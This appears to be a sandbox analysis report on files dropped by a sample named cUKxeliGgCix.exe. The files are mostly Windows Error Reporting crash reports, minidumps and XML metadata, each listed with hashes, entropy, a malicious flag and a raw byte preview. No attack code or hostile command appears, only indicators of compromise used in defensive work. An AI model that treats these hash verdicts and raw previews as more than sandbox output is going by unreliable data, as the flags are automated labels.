                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.0.2.5.2.3.5.7.2.8.0.6.3.6.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.0.2.5.2.3.5.8.7.8.0.6.2.9.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.6.7.0.a.2.f.9.-.3.b.c.3.-.4.5.b.c.-.a.1.c.4.-.0.0.2.a.2.c.6.c.0.3.4.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.0.1.6.f.c.e.5.-.4.e.b.8.-.4.4.1.7.-.8.4.6.a.-.6.4.0.f.1.9.8.8.d.a.e.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.c.U.K.x.e.l.i.G.g.C.i.x...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.4.-.0.0.0.1.-.0.0.1.4.-.e.c.c.e.-.1.c.8.8.b.c.0.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.8.9.5.7.1.a.d.2.4.7.d.2.d.7.b.6.5.6.3.2.3.c.b.9.4.9.1.b.8.1.1.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.c.U.K.x.e.l.i.G.g.C.i.x...e.x.e.....T.a.r.g.e.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_cUKxeliGgCix.exe_a7132afd10b1ed0cae2dbbe315e9f4129aed1a7_f206f5a2_a3fa18c3-18b5-4b15-939b-b5b714903e7b\Report.wer

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):0.9400947366579226
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:V7ZfoeLI8ZO0BU/4gojRJk1zuiFgZ24IO8/k:vwDq1BU/4gojPczuiFgY4IO8/k
                                                                                                                                                                                                            MD5:BCC7178FEF00AFAA92394008BF5C9362
                                                                                                                                                                                                            SHA1:8D8537F88D1A0411B1B01108B87F48D73C6C71DC
                                                                                                                                                                                                            SHA-256:ECA8F5C6D1510F461FA5CB770A4BF52588914B4BE7FF1A72FC126D88C1D425DC
                                                                                                                                                                                                            SHA-512:29FCCE2EF66F515EC7F1A409521C91A99F04156E53F7A22F8BF6720BB78B812907FEA581FB71417913F777408175C7EDECC262D99D07D95F2229638FC2611E9C
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.0.2.5.2.3.5.7.1.7.7.2.7.9.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.0.2.5.2.3.5.8.7.0.8.5.2.9.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.3.f.a.1.8.c.3.-.1.8.b.5.-.4.b.1.5.-.9.3.9.b.-.b.5.b.7.1.4.9.0.3.e.7.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.9.b.e.7.5.7.d.-.b.0.a.2.-.4.5.0.3.-.8.0.9.7.-.3.5.7.1.2.f.e.7.0.7.6.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.c.U.K.x.e.l.i.G.g.C.i.x...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.e.c.-.0.0.0.1.-.0.0.1.4.-.4.3.f.6.-.1.d.8.8.b.c.0.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.8.9.5.7.1.a.d.2.4.7.d.2.d.7.b.6.5.6.3.2.3.c.b.9.4.9.1.b.8.1.1.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.c.U.K.x.e.l.i.G.g.C.i.x...e.x.e.....T.a.r.g.e.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_cUKxeliGgCix.exe_a7132afd10b1ed0cae2dbbe315e9f4129aed1a7_f206f5a2_ac889830-8329-45a0-86cd-7010f935e18e\Report.wer

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):0.93326350310142
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Nq3GoeLIhO0BU/4gojRJkVzuiFgZ24IO8/k:iDh1BU/4gojPczuiFgY4IO8/k
                                                                                                                                                                                                            MD5:F02B3F7A2AC07A9AA9AB068B67014988
                                                                                                                                                                                                            SHA1:63A66DB9B2900CDB992A2AB7BC2DCEFB34C95561
                                                                                                                                                                                                            SHA-256:18A0BB4AC77778192C017FC286FD2A02E9EDD1FD2D8C1707A255D7D2CA159480
                                                                                                                                                                                                            SHA-512:9DC79C7A8D2863718DA711163CAA835E9035A69D8B1E314D9A86E3EEB69BC9E387F36AD1D5A7741EDFF63C3D2D46EE329E935D774D112808059923668B8A9F8F
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.0.2.5.2.3.5.8.5.0.0.0.4.6.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.0.2.5.2.3.5.9.3.2.8.1.7.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.c.8.8.9.8.3.0.-.8.3.2.9.-.4.5.a.0.-.8.6.c.d.-.7.0.1.0.f.9.3.5.e.1.8.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.a.d.6.1.7.4.d.-.8.6.b.d.-.4.0.0.5.-.a.6.4.1.-.0.b.8.c.b.9.1.8.1.9.b.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.c.U.K.x.e.l.i.G.g.C.i.x...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.a.c.-.0.0.0.1.-.0.0.1.4.-.7.1.c.2.-.1.a.8.8.b.c.0.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.8.9.5.7.1.a.d.2.4.7.d.2.d.7.b.6.5.6.3.2.3.c.b.9.4.9.1.b.8.1.1.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.c.U.K.x.e.l.i.G.g.C.i.x...e.x.e.....T.a.r.g.e.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER5CCE.tmp.dmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Sun Sep 8 06:59:17 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):105056
                                                                                                                                                                                                            Entropy (8bit):1.6173935657638276
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:RPKRS1XX2XsThPNADOK8JbXRi7VX0AsFGr+sKWiCruX0VFeJcG/c1MXU75wYRvia:IRwdThPG6zJbXKVoZsKFCaE4crVhi
                                                                                                                                                                                                            MD5:5EE269E3AEADEF4599FE677E73FEF669
                                                                                                                                                                                                            SHA1:C1CD01598DB64808B75EA8A815BB73BB5FC6DE51
                                                                                                                                                                                                            SHA-256:19A43C586215FFF1E0B4CA9167CAAAA03D92076CB5515A1FFE6B60936ABB8653
                                                                                                                                                                                                            SHA-512:5F092E30B6ED263AC879A72AC4E1F76202A214F6B6C5D3A8547463065DEB32C8AE53331ACBC735EBD6720B6FD8202D6DD5E0D95EC59D63140D893B5BC96A0F83
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MDMP..a..... .......EK.f........................................LE..........T.......8...........T............$...u......................................................................................................eJ..............GenuineIntel............T............K.f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D1C.tmp.dmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Sun Sep 8 06:59:17 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):99226
                                                                                                                                                                                                            Entropy (8bit):1.9757782387734482
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:HkRcAkHxAoz2+6/+opK+Ah4WtUqvs3FQq3Lyhz9ER:EoHKoz2+qpK+AhZaqvsehzg
                                                                                                                                                                                                            MD5:32CE1798BD32AA1D983F12BFE38E4CCD
                                                                                                                                                                                                            SHA1:6CEB35454F8FF418A3B1A882CAA3799BBF036AA2
                                                                                                                                                                                                            SHA-256:A0A4AE3EFB3761B8146B6E3932DF9EBA512A289EB4350E35DF3C730B0261128E
                                                                                                                                                                                                            SHA-512:D295B7301D560F16DADAF987640DA09E5523B65CE6320EABC4F8EC95E011F6A274E8867E445A1B36394CAEF1709CAB0BD400F60B18A3E6CC629DB08F353B47A9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MDMP..a..... .......EK.f....................................4...T?..........T.......8...........T...........H"..Ra......................................................................................................eJ......@.......GenuineIntel............T............K.f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER5F50.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8364
                                                                                                                                                                                                            Entropy (8bit):3.705095879913702
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJLJ6p6Y9iSUONgmfKBprm89bTTsf0JAxm:R6lXJl6p6YoSUONgmfKDT4fs
                                                                                                                                                                                                            MD5:4D5C9EFA45693E3480955FCC4D9D37FE
                                                                                                                                                                                                            SHA1:4A61EF76308CDD0B8D0027B73A10332B244CC7F2
                                                                                                                                                                                                            SHA-256:1DD43765C880934A48FFD7B47A49643B029247DD252BE5879A3FBCEC077E2FD7
                                                                                                                                                                                                            SHA-512:014BED998B7977045537D27FF9B7B4C0B5989A1C166CB830AA509E35569B3A5E036B6D247FA43F546817F84CEBF148A7BF440A44FA2B8B075C0B378D48F53F0E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.3.6.<./.P.i.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER5F6F.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8364
                                                                                                                                                                                                            Entropy (8bit):3.704969007959791
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJio6U6Y91SUONgmfKBprL89bTLsflvxm:R6lXJV6U6YvSUONgmfKQTQfC
                                                                                                                                                                                                            MD5:7078D4D241CAF3279708AB3693513DBD
                                                                                                                                                                                                            SHA1:A85283D876B5405D3E3AE08921FD5DC3EBB6AE54
                                                                                                                                                                                                            SHA-256:F01DA8F9436CDB010A9C6BCD65460357D19C3F767640AA15FD61520D67928103
                                                                                                                                                                                                            SHA-512:50BEB2C75A4ACB4130C2A5019969C1C00ED0982982738820B38BD3DB983CD6906356BF6118481EB56EFA042F123032D46D33E80868AD9DCA4099F044BF51ED16
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.9.2.<./.P.i.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER5FBE.tmp.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4629
                                                                                                                                                                                                            Entropy (8bit):4.502106831706027
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsfJg77aI9BeWpW8VY0Ym8M4JUqF8u+q8KpBz9/wd:uIjfBI7Df7VgJn59lwd
                                                                                                                                                                                                            MD5:E80ABDF9FB71A92B1E80DE824CCFD2DB
                                                                                                                                                                                                            SHA1:DAEAE2B14035449AFA21A07561D1E8287AFF7910
                                                                                                                                                                                                            SHA-256:774F8D7850310DC5D49E6304E3BAEA093B144F08438200CCE70B6DC3015922F5
                                                                                                                                                                                                            SHA-512:A1B2F762FD2189DB35C82014D9E5E9C766D23ADF8C326D3ECCD727CBADABEE089DDC994C7457890B780F6133250AFB0CA508FB01F6044ECABC539B34D89C1765
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="490921" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER5FDD.tmp.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4629
                                                                                                                                                                                                            Entropy (8bit):4.500012999999847
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsfJg77aI9BeWpW8VYoYm8M4JUqF7U+q8KQmABz9/DwMdd:uIjfBI7Df7VQJ+gmA9lLdd
                                                                                                                                                                                                            MD5:0758A8317E91CA85C1E35C8036BF5BF1
                                                                                                                                                                                                            SHA1:A4C1DBC0F9251786886054D3719DF8D3902A256B
                                                                                                                                                                                                            SHA-256:D2E30E6933973028649A3CE85A7DACF942F08D4B1D9BFBF9A879DEA615D4AB59
                                                                                                                                                                                                            SHA-512:3AED7F59B9E992121BA8CEEE6D2A2560FE2679FBCAC7680736614305940257E9E53548582BAFEC29682179B8629561D4E84A562FE666533308A1FFED90952DE2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="490921" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER6104.tmp.dmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Sun Sep 8 06:59:18 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):71420
                                                                                                                                                                                                            Entropy (8bit):1.8708744289149803
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:CXBP95zKXHXtpgF+5uUOK8mifpvJ7rycQ676ZyCzgh5a4YvAyHyuo87:ABF5zkpgF+5yzmOvJ7ry/ynaVto0
                                                                                                                                                                                                            MD5:6A04D47198CF131BB590BE8AB2B90E4D
                                                                                                                                                                                                            SHA1:BCF94BB926F1667A86FAF133891B0260A17624E9
                                                                                                                                                                                                            SHA-256:71E356C61C875FB08B954DF47DC969843C29A754B1F5E4ACCD916244FFF426AC
                                                                                                                                                                                                            SHA-512:28B5C34CB013DE5323C3CB0D3F7E68184896B1D3B914EDC6819E577AD2A184DA3168DE4A4D4C4BA54553C4107F52798E1D8FF931C3EBEA049DC24CC6788DFCBC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MDMP..a..... .......FK.f............$...............,............5..........T.......8...........T...........P...........................................................................................................eJ......D.......GenuineIntel............T.......@....K.f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER61FE.tmp.dmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Sun Sep 8 06:59:18 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):97822
                                                                                                                                                                                                            Entropy (8bit):1.838379220490653
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:ZcXapZo9TzT7fVs3bIV1j2YA0YCUv1qowIVhl:hoZzT7feIMAYXj9h
                                                                                                                                                                                                            MD5:58F5AD9F1640E9F11AC5147E1059D84F
                                                                                                                                                                                                            SHA1:023008FEF53A745F84AEC9AA7765C5C429ED7B24
                                                                                                                                                                                                            SHA-256:65109DA2C051D9A6589D16E1CE009548CFB2CDD6CD70ABDDA14227212C5576F7
                                                                                                                                                                                                            SHA-512:5FD64064B2CD5B0826E1039C6D59D13B77285ED8E4D06E3B6ED127F5C776C1D5A548A9E46938494F28A9C771BB7892CB778A1EA34CE61F8FF74A6D9EF5E082DB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MDMP..a..... .......FK.f.........................................>..........T.......8...........T...........0!...\..........P...........<...............................................................................eJ..............GenuineIntel............T............K.f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER622E.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8364
                                                                                                                                                                                                            Entropy (8bit):3.702602515134831
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJ49686Y9vSUONgmfKBprs89bEaFWsfpsm:R6lXJq686YFSUONgmfKVEaf3
                                                                                                                                                                                                            MD5:701C1B46086C1365FB9B7BE03F28161E
                                                                                                                                                                                                            SHA1:3301CB2EF07EA45A7FCBC8881F0ED7F306FF60AA
                                                                                                                                                                                                            SHA-256:E2837BCDCD05FE92D3A1E3634B2AA1DF701D0A84E7CCB7044AFCDB6EC48CA4EA
                                                                                                                                                                                                            SHA-512:2D69E2DF069DF9CB64086CBE6DBE73CD8927C96B33783CD60FB5408CB8B4E7DAC28EE4799D8B77A824EA15DF5D6314D8CB8319EEA6730C3D30176D8660FB45E6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.7.6.<./.P.i.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER62BC.tmp.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4629
                                                                                                                                                                                                            Entropy (8bit):4.501667064394497
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsKJg77aI9BeWpW8VY3Ym8M4JUqFT+q8KtBz9/fd:uIjfYI7Df7VrJB99lfd
                                                                                                                                                                                                            MD5:E754086D9978C14CF289E87E41D6CF53
